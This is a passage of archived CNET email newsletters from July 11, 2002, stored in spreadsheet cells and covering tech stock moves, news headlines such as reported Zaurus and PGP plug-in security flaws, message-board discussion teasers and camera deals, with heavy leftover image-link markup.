\n---|---|---|---  \n![]([URL]http://home.cnet.com[/URL]  | APHT | 4.07 |\n-26.67%  \n![]([URL]http://home.cnet.com[/URL]  | AUTN | 2.3 |\n-26.52%  \n![]([URL]http://home.cnet.com[/URL]  | MHCO | 2.74 |\n-21.71%  \n![]([URL]http://home.cnet.com[/URL]  | PMFG | 9.5 |\n-21.22%  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Live tech help NOW!\n\nApril's tech award\n\n1 million open jobs\n\nNews.com: Top CIOs\n\nZDNet: PeopleSoft **  \n---  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \nJuly 11, 2002  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] DJIA  \n8801.53  -11.97 | ![]([URL]http://home.cnet.com[/URL]\nNASDAQ  \n1374.43  28.42 | ![]([URL]http://home.cnet.com[/URL] S&amp;P;\n500  \n927.37  6.90 | ![]([URL]http://home.cnet.com[/URL] CNET\nTECH  \n995.16  29.87  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**CNET News.com Vision Series**  \nRead News.com's exclusive interviews of 10 top CIOs.  \nVision Series home  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n**Battered stocks regain ground**  \nLed by a surge in chip titan Intel, beaten-down technology shares rose\nThursday.\n\nDespite a Merrill Lynch downgrade of Yahoo to "reduce/sell", the Internet\nportal rose after posting better-than-expected second-quarter results and also\nhelped lift the sector. CNET's Tech index gained 29.87 points, or 3.11\npercent, to close at 995.16. The tech-laden Nasdaq composite index tacked on\n28.42 points, or 2.11 percent, to close at 1,374.43--after hitting a five-year\nlow Wednesday.\n\nBroader markets were mixed amid news wholesale prices rose slightly and drug\nfirm Bristol-Myers Squibb is being probed by the Securities and Exchange\nCommission. The Dow Jones industrial average fell 12.0 points, or 0.14\npercent, to close at 8,801.5. The S&amp;P; 500 added 6.9 points, or 0.75 percent,\nto close at 927.37, after it too reached a five-year low Wednesday.  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![Top Investor News]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**With rebates, HP angles for PC sales**  \nHewlett-Packard is trying to beat the heat with summer deals on PCs. For\nretail buyers in the United States, the company is offering several new rebate\nor promotional programs, designed to stimulate demand for its PCs, going into\nthe back-to-school shopping season. Some of the deals include a new $200 mail-\nin rebate on desktops, while others offer instant $50 rebates.  \n **HEWLETT-PACKARD CO 15.23 -0.13%**\n\n**Shareholders sue PayPal, eBay**  \nThe PayPal-eBay merger has hit an early snag: Two shareholder lawsuits have\nbeen filed against the companies seeking to block the deal. The lawsuits, each\nfiled in Delaware Chancery Court earlier this week on behalf of PayPal\nshareholders, charge that the deal represents a breach of the companies'\nfiduciary duty to those shareholders and that the price eBay is paying for\nPayPal is unfair and inadequate, the companies said in separate regulatory\nfilings on Thursday.  \n **EBAY INC 60.38 2.63%**\n\n**SAP cuts forecast, shows Q2 loss**  \nEurope's biggest software maker, SAP AG, shocked the market on Thursday by\nunexpectedly cutting its sales forecast and missing analysts' forecast for the\nsecond quarter. The company said it would post a net loss of 235 million euros\n($232 million) and said it was taking a non-recurring accounting charge of 414\nmillion euros to cover impairments of minority investments in the United\nStates, including a 318 million euros charge from its 20 percent stake in\nCommerce One.  \n **SAP AKTIENGESELLSCHAFT ADS 19.70 -7.73%**\n\n**Also from CNET**  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \nReal-time stock quotes from CNET News.com Investor.  \n30-day free trial!\n\n![Today's Broker Reports]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**Merrill Lynch downgrades Yahoo in report 7/11/02**  \nAnalysts Justin Baldauf and Tim Gernitis cut their intermediate-term rating on\nthe Internet giant from "neutral" to "reduce/sell" and their long-term rating\nfrom "strong buy" to "neutral" after seeing Yahoo's second-quarter results.\nAlthough the results look solid at first, Baldauf and Gernitis say Yahoo's\ngrowth was driven entirely by new initiatives. They also argue the firm's\nimproved outlook seems driven completely by the Overture deal extension.\nEventually, these initiatives will result in much lower growth rates, the\nanalysts say. They argue Yahoo's stock price isn't supported by the firm's\nfundamentals.  \n **YAHOO INC 12.92 5.99%**  \nVisit the Brokerage Center\n\n![CEO Wealth Meter]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**EMC lures HP exec to technology post**  \nEMC has hired Mark Lewis away from Hewlett-Packard to become chief technology\nofficer and vice president of new ventures, the high-end storage specialist\nsaid Thursday. Lewis had been head of Compaq Computer's high-end storage\ndivision, then became head of worldwide storage marketing after the company's\n$19 billion merger with HP. He replaces Jim Rothnie, who is retiring and\nbecoming CTO emeritus.  \n **EMC CORP 8.15 4.49%**  \nVisit the CEO Wealth Meter  \n\n  \n  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![Crucial 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URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n| **NEW!** CNET professional e-mail publishing for just $24.95/month. **FREE\nfor 30 days. Click here!**  \n---  \n  \n![Sign up for more free newsletters from\nCNET!]([URL]http://a.r.tv.com[/URL]  \nThe e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com\n\nUnsubscribe | Manage My Subscriptions | FAQ | Advertise\n\nPlease send any questions, comments, or concerns to dispatchfeedback@news.com.  \n![]([URL]http://www.zdnet.com[/URL] ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]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26&amp;ISSUE=2002-07-11)  \n  \n---|---  \n.  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.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home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.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zdnet@example.com\nFrom: "CNET News.com Daily Dispatch" &lt;Online#3.19832.06-muuDgykAuGh_FdRR.1@newsletter.online.com&gt;\nDate: Thu, 11 Jul 2002 15:19:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 15:19:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET News.com Daily Dispatch" &lt;Online#3.19832.06-muuDgykAuGh_FdRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>CNET NEWS.COM: Copies, Webcasts tangled in draft bill</t>
  </si>
  <si>
    <t>![]([URL]http://home.cnet.com[/URL]  \n|\n\n|  ![](/b.gif)  \n  **Search**  \n  \n  News.com All CNET     The Web  \n---  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Live tech help NOW!\n\nApril's tech award\n\n1 million open jobs\n\nNews.com: Top CIOs\n\nZDNet: PeopleSoft **  \n---  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n|  | ![In the News]([URL]http://home.cnet.com[/URL]  \n| July 11, 2002  \n  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] Copies, Webcasts tangled in draft\nbill  \n![]([URL]http://home.cnet.com[/URL] Sharp's Zaurus PDA suffers\nsecurity holes  \n![]([URL]http://home.cnet.com[/URL] Outlook plug-in could let the\nhackers in  \n![]([URL]http://home.cnet.com[/URL] ACLU: Don't rat out your customers  \n![]([URL]http://home.cnet.com[/URL] Shareholders sue PayPal, eBay  \n![]([URL]http://home.cnet.com[/URL] Ellison: I don't need an\nunderstudy  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n|  | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |   **Vision Series**  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n  \nRead News.com's exclusive interviews of 10 top CIOs.  \n**Vision Series home**  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n**Copies, Webcasts tangled in draft bill**  \nLegislators are readying a bill that could sharply limit Americans' rights\nrelating to copying music, taping TV shows, and transferring files through the\nInternet. At the same time, the draft legislation seen by CNET News.com would\nplace the struggling Webcasting industry on firmer legal footing.  \nJuly 11, 2002, 11:35 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Sharp's Zaurus PDA suffers security holes**  \nSharp's Linux-based, business-oriented Zaurus handheld suffers from security\nholes that could let hackers grab private data off a corporate network,\naccording to researchers at Syracuse University. In an advisory posted\nWednesday to a Syracuse University computer-science Web site, researchers said\nthey had found vulnerabilities in Sharp's Zaurus SL-5500 and Zaurus SL-5000D\nhandhelds. The flaws let attackers take control of the device's file system,\ngiving them the power to overwrite files or lock the device so no data can be\ninput through the keypad or touch screen.  \nJuly 11, 2002, 12:50 PM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Outlook plug-in could let the hackers in**  \nA widely used plug-in for Microsoft's Outlook e-mail client that lets users\nencrypt and digitally sign messages has inadvertently weakened security and\nleft the mail program open to attack. Security company eEye Digital Security\nissued a warning late Wednesday to users of Network Associates' Pretty Good\nPrivacy (PGP) plug-in for Outlook, saying that a vulnerability in the add-on\ncould let attackers execute malicious software on a victim's computer. Network\nAssociates released a patch for the problem Wednesday as well.  \nJuly 11, 2002, 11:05 AM PT |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n  \n**ACLU: Don't rat out your customers**  \nA clutch of civil liberties groups is asking small Internet service providers\nto get a backbone and stand up to companies seeking to unveil anonymous\ncritics. A group including the Electronic Frontier Foundation, the American\nCivil Liberties Union (ACLU), and the Center for Democracy and Technology is\nurging ISPs to alert customers when they are the targets of so-called John Doe\nlegal actions, which try to unmask the identities of people who anonymously\nair their companies' dirty laundry. The group has sent letters to more than\n100 ISPs, asking them to adopt a written policy promising to let customers\nknow if they're targets.  \nJuly 11, 2002, 12:35 PM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Shareholders sue PayPal, eBay**  \nThe PayPal-eBay merger has hit an early snag: Two shareholder lawsuits have\nbeen filed against the companies seeking to block the deal. The lawsuits, each\nfiled in Delaware Chancery Court earlier this week on behalf of PayPal\nshareholders, charge that the deal represents a breach of the companies'\nfiduciary duty to those shareholders and that the price eBay is paying for\nPayPal is unfair and inadequate, the companies said in separate regulatory\nfilings on Thursday.  \nJuly 11, 2002, 11:50 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Ellison: I don't need an understudy**  \nDeflecting continuing calls for a No. 2 executive, Oracle Chief Executive\nLarry Ellison said again Wednesday that the company does not need anyone to\nback him up. Ellison, responding primarily to recent news stories that the\ncompany might need a second in command, said the current team is enough to\nguide Oracle.  \nJuly 10, 2002, 6:05 PM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n|  **From our partners:**  \n---  \n![]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \n**Meet Microsoft, home networker**  \nBusiness Week  \nThe Colossus of Redmond's next bold move is into routers that'll let consumers\nconnect their digital devices together and to the Net.  \nJuly 11, 2002  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Sprint: Not out, but winded**  \nBusiness Week  \nWhile it's hardly the next WorldCom, slowing wireless growth and red ink in\nlong-distance are hardly fuel for its stock.  \nJuly 11, 2002  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Also from CNET:**  \n---  \n![]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \nReal-time stock quotes from CNET News.com Investor.  \n30-day free trial!  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |  ![Crucial\n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n  \n![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://news.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n|  **Tech hurdles ahead for e911**  \nCorrespondent Melissa Francis looks at the technology hurdles facing wireless\ncarriers in launching the second phase of the e911 initiative by October.  \n![]([URL]http://news.cnet.com[/URL] **Watch Video**  \n  \n---|---|---  \n  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] |  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n  \n**Enterprise**  \n\n  * 'Father of Pentium' sets up India VC fund\n  * EMC lures HP exec to technology post\n  * Japan's major chipmakers join forces \n|\n\n**E-Business**  \n\n  * Stocks tumble to new lows\n  * Expedia snubs parent company's bid\n  * Earnings alert: Yahoo back in black \n  \n---|---  \n  \n**Communications**  \n\n  * KPN says it will unplug KPNQwest network\n  * Verizon to ask NorthPoint claim get tossed\n  * WorldCom won't pay MCI shareholders \n|\n\n**Media**  \n\n  * Lawmakers: Keep your tunes to yourself\n  * Movielink: Bring on the experts\n  * Web users ante up for games, classmates \n  \n  \n**Personal Technology**  \n\n  * Teen handheld maker wants to play\n  * RIM files second suit against Good\n  * Gamers invade Army Web site \n|  \n  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]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n\nThe e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com  \nUnsubscribe | Manage My Subscriptions | FAQ | Advertise\n\nPlease send any questions, comments, or concerns to dispatchfeedback@news.com.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33&amp;ISSUE=2002-07-11)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: CNET Message Boards &lt;Online#3.19822.84-7a8Hl0_lygzZARRR.1@newsletter.online.com&gt;\nDate: Thu, 11 Jul 2002 13:56:32 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 13:56:32 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Message Boards &lt;Online#3.19822.84-7a8Hl0_lygzZARRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>CNET: Why I don't use firewalls</t>
  </si>
  <si>
    <t>![CNET Message Boards Newsletter]([URL]http://www.cnet.com[/URL]  \n| ![](/b.gif)  \n  \n---  \n![](/b.gif)  \n| ![](/b.gif)  \n| ![](/b.gif)  \n  \n![](/b.gif)  \n  \n![]([URL]http://a.r.tv.com[/URL]  \n\n|  ![CNET Search.com]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://cnet.com[/URL]  \n  \nMessages All CNET The Web  \n---  \n  \n![More Forums]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n1\. Wireless  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n2\. Computer Help  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n3\. Speakeasy  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n4\. Windows 98  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n5\. PC Hardware  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n6\. Windows Me  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n7\. Computer Newbies  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n8\. Downloads  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n9\. Windows XP  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n10.Virus &amp; Security  \n![]([URL]http://www.cnet.com[/URL]  \n  \n  \n![Hot Products]([URL]http://www.cnet.com[/URL]  \nCheck out the User Opinions on these Hot Products and then submit one of your\nown.  \n  \n  \n---  \n92% ![User Opinions]([URL]http://download.cnet.com[/URL]\n8%![]([URL]http://download.cnet.com[/URL] (3629 votes)  \nRAMBooster  \nIn Downloads: Optimizers &amp; Diagnostics  \n85% ![User Opinions]([URL]http://download.cnet.com[/URL]\n15%![]([URL]http://download.cnet.com[/URL] (2878 votes)  \nZoneAlarm  \nIn Downloads: Security &amp; Encryption  \n84% ![User Opinions]([URL]http://download.cnet.com[/URL]\n16%![]([URL]http://download.cnet.com[/URL] (50 votes)  \nVirusMD Family Webfilter 1.0  \nIn Downloads: Browsing Companions  \n**More User Opinions**  \n  \n  \n**Computer Problems?** Try our Live Support from a Live technician!  \n  \n---  \n![]([URL]http://www.tech24.com[/URL]  \n---  \n![]([URL]http://www.tech24.com[/URL] |  \nType here and click go.  \n  \n  \n![]([URL]http://www.tech24.com[/URL] |\n![]([URL]http://www.tech24.com[/URL]  \n![]([URL]http://www.tech24.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![](/b.gif)  \n  \n---  \n![](/b.gif)  \n  \n![](/b.gif)  \n  \n| ![](/b.gif)  \n  \n---  \n![](/b.gif) | ![](/b.gif)  \n| ![](/b.gif) |  | ![](/b.gif)  \n|  | July 11, 2002  \n  \n---  \n|  **Dear Readers,**  \nWith all the corporate scandals--such as WorldCom and Enron--surrounding us,\nwho can you trust nowadays? Well, for starters, you can trust the CNET Message\nBoards. The CNET Message Boards are as real as it gets. When it comes down to\ngiving or receiving honest tech advice, there's no better place to be. In the\nBoards there are no reviews or tests by professionals, just real, true-life\nexperiences and discussions from people like you and me who share one common\ninterest: the love of today's challenging technology. There are no sneaky\nexecs here or scandals to worry about, so if you have a specific problem or\nquestion in mind, post it! You won't be disappointed.  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n---  \nLee Koo  \nCNET Community  \nGot suggestions? Email me: messageboards@cnet.com  \n  \n  \n![](/b.gif)  \n  \n![](/b.gif)  \n---  \n![Crucial Clicks]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://a.r.tv.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | **Digicams for summer shutterbugs**  \nGoing on vacation, or just headed to the beach? Indulge your summer snapshot\nhabit with one of our picks.  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \nÂ• 5-megapixel shoot-out  \nÂ• Leica Digilux 1: street shooter"s digicam.  \n  \n![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n**Most popular products**  \n![]([URL]http://home.cnet.com[/URL]  \n**Digital cameras**  \n![]([URL]http://home.cnet.com[/URL]  \n1\. Canon PowerShot G2  \n![]([URL]http://home.cnet.com[/URL]  \n2\. Canon PowerShot S40  \n![]([URL]http://home.cnet.com[/URL]  \n3\. Canon PowerShot S30  \n![]([URL]http://home.cnet.com[/URL]  \n4\. Canon PowerShot A40  \n![]([URL]http://home.cnet.com[/URL]  \n5\. Nikon Coolpix 995  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL] **See all most popular\ncameras**  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![Simple Questions w/Simple\nAnswers]([URL]http://www.cnet.com[/URL]  \n| ****  \n---|---  \n![](/b.gif)  \n  \n![](/b.gif)  \n  \n**Why I don't use firewalls**  \nDo you need some honest opinions? Despite all the horror stories that you hear\nof hackers and Trojans intruding on one's personal computer, hear why one of\nour veteran moderators refuses to use a firewall. This discussion gets a bit\nheated, but her point was well taken. Take a look and see why she refuses, and\nif you have a cent or two to throw in, the donation jar is wide open. More\nSecurity and Virus Alerts discussions\n\n**The scoop on USB 2.0**  \nThe chances are that the next time you pick up an external computer\nperipheral, it will be utilizing USB 2.0 to connect to your computer. So what\nis USB 2.0? Is it that much faster than USB 1.1? Will your current USB port be\ncompatible with peripherals with the new version? Well if you have similar\nquestions, I gathered up some discussion on this topic in hopes that it will\nbring a better understanding of what's in store for USB 2.0. Take your pick.\n\n  * USB vs. USB 2.O\n  * How to upgrade from USB 1.1 to 2.0?\n  * USB 2.0 with reverse compatibility with USB 1.1?\n  * More Hardware discussions \n\n**Windows XP not any faster than Windows 98SE?!**  \nMany users have jumped ship and moved on to newer and supposedly better things\nsuch as Windows XP, but what if it doesn't perform up to par and is actually\nslower than the previous OS that you had? Check out this discussion; what's\nnewer may not always be faster. More Windows XP discussions\n\n**Best type of backup system to use for someone that is indigent?**  \nBacking up your hard-drive system sounds like a task for veteran, but is it?\nIn this discussion, a beginner is asking for sound advice on the best type of\nbackup system to use, and sure enough, he received a bunch of options to\nchoose from. If you're in that same boat and looking for the best ways to back\nup some of that important data of yours, this discussion is for you. Have a\nlook. More Computer Newbies discussions\n\n**Warning for kids and teens online**  \nIf you're a parent, this may be something that you may want to read about kids\nonline. I found it interesting enough to pass along because I know someday\nI'll be faced with the same worries when my kids are out surfing the web. So\nhave a look, and if it doesn't interest you, pass it on to someone who may\nfind it informative.\n\n![Simple Questions w/Simple Answers]([URL]http://www.cnet.com[/URL]  \n| ****  \n---|---  \n![](/b.gif)  \n  \n![](/b.gif)  \n  \n* | **XP and defragmenting**  \n  \n---|---  \n* | **Can RAM be "worn out"?**  \n  \n* | **WinModem vs. "full" modem**  \n  \n  \n![Help your fellow Boarders]([URL]http://www.cnet.com[/URL]  \n| ****  \n---|---  \n![](/b.gif)  \n  \n![](/b.gif)  \n  \n* | **My PC won't wake up**  \nfrom Jen Smith  \n---|---  \n**\n\n* **| **Purchasing a CD-RW--what kind?**  \nfrom Graham Hurst  \n  \n![]([URL]http://home.cnet.com[/URL]\n![]([URL]http://home.cnet.com[/URL] **\n\n  * Live Tech Help. Submit your question now.\n  * CNET News.com: Top CIOs on the future of IT.\n  * Find a job you love. Over 1 million postings\n  * ZDNet: This IT director has had enough of Microsoft\n  * May Editors" Choice Award: Pioneer"s Home Theater System HTS - 910DV\n\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zdnet@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2&amp;NL=e430&amp;ISSUE=2002-07-11)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: CNET Shopper Newsletter Alerts &lt;Online#3.19820.a5-ydZylz9lGW0yrsRR.1@newsletter.online.com&gt;\nDate: Thu, 11 Jul 2002 13:50:34 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 13:50:34 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Shopper Newsletter Alerts &lt;Online#3.19820.a5-ydZylz9lGW0yrsRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Great deals on perfect Summer cameras! (CNET SHOPPER)</t>
  </si>
  <si>
    <t>![CNET Shopper Newsletter\nAlerts]([URL]http://www.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n|  \n---  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Live tech help NOW!\n\nApril's tech award\n\n1 million open jobs\n\nNews.com: Top CIOs\n\nZDNet: PeopleSoft  **  \n---  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |  |  |  |\n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \nJuly 11, 2002 | ![]([URL]http://www.cnet.com[/URL] | **From\nComputers4Sure**  \nFujifilm FinePix 30i just $245!  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] | **From buy.com**  \nGreat deals and free shipping!  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n  \n\n**Computers4Sure** |\n\n![]([URL]http://shopper.cnet.com[/URL]  \n  \n---|---  \n![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Fujifilm FinePix 30i**  \nÂ• 1,920,000 pixels  \nÂ• 2.5 x digital zoom  \nÂ• MP3 player  \n   **Just $299**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Olympus Camedia D-40 Zoom**  \nÂ• 4.0-megapixel, 1.8-in LCD monitor  \nÂ• 2.8x optical/2.5x digital zoom  \nÂ• Incl. 16MB SmartMedia card  \n   **Just $599**  \n![]([URL]http://www.cnet.com[/URL]  